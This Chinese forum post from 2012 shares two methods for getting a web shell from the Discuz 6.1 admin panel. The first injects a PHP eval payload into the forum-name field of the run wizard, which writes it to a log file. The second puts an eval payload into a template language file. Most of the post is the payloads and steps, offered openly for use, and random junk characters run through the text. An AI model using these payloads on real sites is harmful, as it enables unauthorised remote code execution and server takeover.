discuz6.1两种方法后台拿shell
* }; P- c" m+ \' Y% m ~好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下8 l$ I# t8 \" t1 m' H2 |
1: Q- } y d0 A$ e9 G9 B
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
$ W) Y. |& g: P5 N# r1 I% Nadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell. i& U- V1 Z+ {$ x$ i
<?php eval($_POST[cmd]);?>
|, P8 C. Y) ~3 u& Z后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
8 f7 z" H& A" `% w H3 A, A2 V8 k" n
5 H/ @. C* X1 ^% a* Q) x1 _
2:后台模板管理--默认模板套系--详情6 |% T$ }- o# C$ B) M) a p
templates/default/actions.lang.php
0 t6 Y2 Q; E# _ Rjhackj\\');eval($_POST[cmd])?>;//( x/ w' e4 l8 Z" {) ^% j8 ~0 \
+ Z: L- W. f/ Q3 ?: D利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对